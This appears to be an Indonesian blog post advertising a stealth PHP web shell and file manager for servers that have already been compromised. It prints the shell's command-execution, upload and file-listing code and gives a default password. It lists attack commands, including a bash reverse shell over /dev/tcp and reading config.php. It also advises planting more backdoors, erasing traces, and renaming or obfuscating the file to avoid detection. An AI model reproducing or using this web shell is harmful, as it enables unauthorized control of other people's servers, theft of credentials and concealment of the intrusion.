NyxCode in the Shell - File Manager [Stealth]
🕶️ Apa Itu NyxCode in the Shell - File Manager
NyxCode in the Shell - File Manager adalah file manager sekaligus shell command executor yang dibuat oleh kolaborasi NyxCode x 0x6ick. File ini hanya 1 PHP script, cocok untuk:
- Akses server secara stealth
- Upload backdoor tambahan
- Hapus file jejak
- Eksekusi command seperti
ls
,cat config.php
,uname -a
- Rename atau delete file target
Tool ini dirancang untuk operasional post-exploitation yang ringan, minim noise, dan cukup powerful buat handler di server kompromi.
📦 Fitur Utama
- Password Login Simple: Mencegah orang lain asal buka shell tanpa otentikasi.
- File Explorer: Lihat isi direktori target + navigasi folder.
- Upload File: Cocok buat drop shell tambahan (contoh:
b374k.php
). - Delete & Rename: Bisa hapus jejak atau ubah nama file target.
- Command Execution: Eksekusi command terminal langsung dari web.
🕸️ Cuplikan Kode
session_start();
if(!isset($_SESSION['gits_login'])) {
//…
}
🔐 Password default: ghost.
📂 File Manager Tampilan Terminal Style
- Folder bisa di-click untuk navigasi
- File tampil dengan ukuran & permission
- Aksi: Delete & Rename
foreach($files as $file) {
echo '<tr><td>'.
(is_dir($file)
? "<a href='?path=$path/$file'>$file</a>"
: $file).
'</td><td>'.(is_file($file)?filesize($file):'-').
'</td><td>'.perms($file).
'</td><td>'.(is_file($file)
? "<a href='$link&act=del'>Delete</a> | <a href='$link&act=rename'>Rename</a>"
: '-').
'</td></tr>';
}
🚀 Eksekusi Command via Web
if(isset($_POST['cmd'])) {
echo '<pre>'.shell_exec($_POST['cmd']).'</pre>';
}
whoami
ls -la
cat config.php
uname -a
bash -i >& /dev/tcp/ip/port 0>&1
📤 Upload File
if(isset($_FILES['up'])) {
if(move_uploaded_file($_FILES['up']['tmp_name'], $_FILES['up']['name'])) {
echo "<p>Upload Success!</p>";
} else {
echo "<p>Upload Failed!</p>";
}
}
Drop tools tambahan seperti b374k shell, WSO, dll.
⚠️ Ethical Hacking
Ingat: Use at your own risk.
📥 Download
Repo: GitHub
Raw: Raw File
🛠️ Tips Stealth & Advanced
- Ganti password default menjadi unik.
- Rename file menjadi random seperti
a1b2c3.php
. - Obfuscate script sebelum upload.
🔥 Penutup
Dengan N6.php, kini kau punya file manager + shell yang stealth dan powerful.
"In the shell we trust — 0x6ick"
Posting Komentar